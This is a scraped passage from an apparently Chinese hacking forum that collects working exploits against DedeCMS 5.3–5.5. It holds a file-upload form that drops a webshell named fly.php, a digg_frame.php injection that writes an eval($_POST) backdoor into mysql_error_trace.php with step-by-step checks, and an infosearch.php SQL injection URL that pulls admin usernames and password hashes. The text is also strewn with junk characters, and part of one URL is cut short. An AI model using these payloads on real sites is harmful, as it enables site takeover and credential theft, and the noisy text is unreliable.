<input type='hidden' name='job' value='upload' />0 Q5 U' Q$ C& R) ]
<input type='hidden' name='newname' value='fly.php' />
5 s% G& w9 E* }" p& GSelect U Shell <input type='file' name='uploadfile' size='25' />5 j5 L) i: s( u6 ]; m5 N
<input type='submit' name='sb1' value='确定' />
* s/ B; H  A% A+ p0 l# k</form>
) w1 Q9 i- q3 R# Z<br />It's just a exp for the bug of Dedecms V55...<br />
! \% g' q- \; q/ b$ a" W" K4 z: y: fNeed register_globals = on...<br />& y: _; v8 d/ a  J
Fun the game,get a webshell at /data/cache/fly.php...<br />
6 P7 d: D3 }6 R  I</body>
! F# R$ I; ^. M! s* t+ {- Q! n</html>
* V5 B1 V/ i: C8 l7 P! E+ d( a2 ?/ b( n/ h
: ^( U# Y# s1 X  b3 b
" R3 I7 p% ?/ t9 v- [" X) U

- q, C8 G( j  K( r& n; e7 e8 V, x0 J5 @8 P. f( ^

  Z+ A8 e$ X% H2 G- `8 f, `
) H4 ?/ Z. P) J
( _2 R2 ], G- z+ v% o# a% n9 d2 k# M0 {$ b# @

0 K% p8 g4 _9 V  u9 h. X织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
% I0 X, O5 U' y7 a利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
& u4 S# W! p/ l; O6 ]9 u1. 访问网址：- g4 ~. X4 ^0 O; Z
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
" n3 `; a" F; M& A" E可看见错误信息4 t1 u* K2 ?6 l

# V% S# u1 \+ [* Z6 z8 c$ A! r% o# b) C) X9 N9 Y! Q8 b
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
2 d* h3 D9 C) u3 V# l7 d) }( Bint(3) Error: Illegal double '1024e1024' value found during parsing
) l9 V& A! I$ u/ vError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>1 O2 S- L7 ~, ?0 Z9 V7 I" Q
. @. t& K! X0 x6 Q! i4 {( ^; L

' v$ J( w& ]) C3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是9 u8 M, [9 h4 x% r
4 Q+ _& l) y0 s. c
3 b( n' b" Y/ Z; A
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>1 m# n. {8 A3 o5 Y  |
' u3 ^5 Q# I+ m

  s6 g! A* b, |% `# u5 |; p按确定后的看到第2步骤的信息表示文件木马上传成功.& e; c6 }) Q. y9 ?2 u

: X! L- q- C- n
: @( S/ ~; x7 c5 F" ~2 p
( y" O8 B5 Z3 k/ F
; j* `& g9 b8 o& C5 M
! W* U% o' _# G+ q, m$ h* G4 \8 a+ S, E6 F' S& r2 g
* `  B1 |9 Z9 ^/ d! X3 H; ]
1 B8 S! C; F( l6 u* m
4 W/ w$ f$ s# S0 e: @

9 }% f* G4 s, b7 ?, L" w# C5 \& [0 Y. [% Y$ ?0 A

: [) p- r* \- G* n; G9 B- o织梦(DedeCms)plus/infosearch.php 文件注入漏洞7 c. F: h$ F) }0 D
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册